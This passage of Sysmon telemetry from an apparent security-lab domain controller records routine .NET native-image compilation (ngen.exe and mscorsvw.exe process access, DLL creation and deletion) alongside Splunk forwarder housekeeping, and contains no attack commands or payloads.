21:01:22.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.467{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A122-60D3-9202-00000000CF01}6652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.342{4DB9351A-A120-60D3-9102-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHHCQ7B43U\System.ServiceModel.Activities.ni.dll.auxMD5=DDB7231C3CE9AA4F6403B03F18570455,SHA256=BF05B11C53EC462BA62BC4466C6DF20FA8230702A3B6FB012AB3BE2BD68B43BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.342{4DB9351A-A120-60D3-9102-00000000CF01}5720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JHHCQ7B43U\System.ServiceModel.Activities.ni.dllMD5=4B411016CB3BBCD0A89F1D6D7A568E9B,SHA256=E5E2C8D503534AFF936493D2EDA30D0602BD4FCA8D0526C31B029E6405DFB5A6,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:22.279{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1658-0\System.ServiceModel.Activities.dll2021-06-23 21:01:22.279 23542300x800000000000000019008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:22.029{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3822E1236529F4B7451C9513E2B8833,SHA256=9F85CD1A67086299B254C8BA03E247E79657A4C32BD06B72BD053D74D9F4FE78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.888{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.888{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9602-00000000CF01}6988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.810{4DB9351A-A123-60D3-9502-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NORY0L6TLS\System.ServiceModel.Discovery.ni.dll.auxMD5=9464ED6AA1A915927FA940EDB6ED8748,SHA256=660A0947C8208EF55CC5B4CF6CFB7F01915903A481AF426A4C3DFA87C26771BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.810{4DB9351A-A123-60D3-9502-00000000CF01}2488NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NORY0L6TLS\System.ServiceModel.Discovery.ni.dllMD5=ACDEF191C255DA8ED7C0B5D99D5A644B,SHA256=8F2B92894F272F7841A7AC452BC42702C594B6A135B8DDD3DD81E1CEA52C506B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:23.763{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9b8-0\System.ServiceModel.Discovery.dll2021-06-23 21:01:23.763 23542300x800000000000000019026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.513{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7E858A2828DB53AB0F8D43D99B292E1,SHA256=2B8A3812DF73EA27BC3DA30082BE3680A44E2AC0E1FD7BDF82E93A56467E9671,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.185{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.170{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9502-00000000CF01}2488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E264715E59A65040000A66D38127D06,SHA256=3E7DD6AAFE7F33B80FC4D7CB4A35A8A88317D5C6C15E43EA69C44F4F33D6FB21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.013{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A123-60D3-9402-00000000CF01}6792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.888{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBFBEF63DDF9C8401ACC2D1947EB06C6,SHA256=06C1BE728E12D137FF7C78D88099784DEDA484623649153224AC4950A76D1CF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.607{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.607{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.513{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.498{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.498{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000019037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:24.435{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1320-0\System.ServiceModel.Internals.dll2021-06-23 21:01:24.435 23542300x800000000000000019036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.076{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33C943E4A21920C3865EE41C386FC9D,SHA256=6F3C9E36A5277A22A55B9E5A2F8469EB0E3A651C1AE4A9985CCB897728F414FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 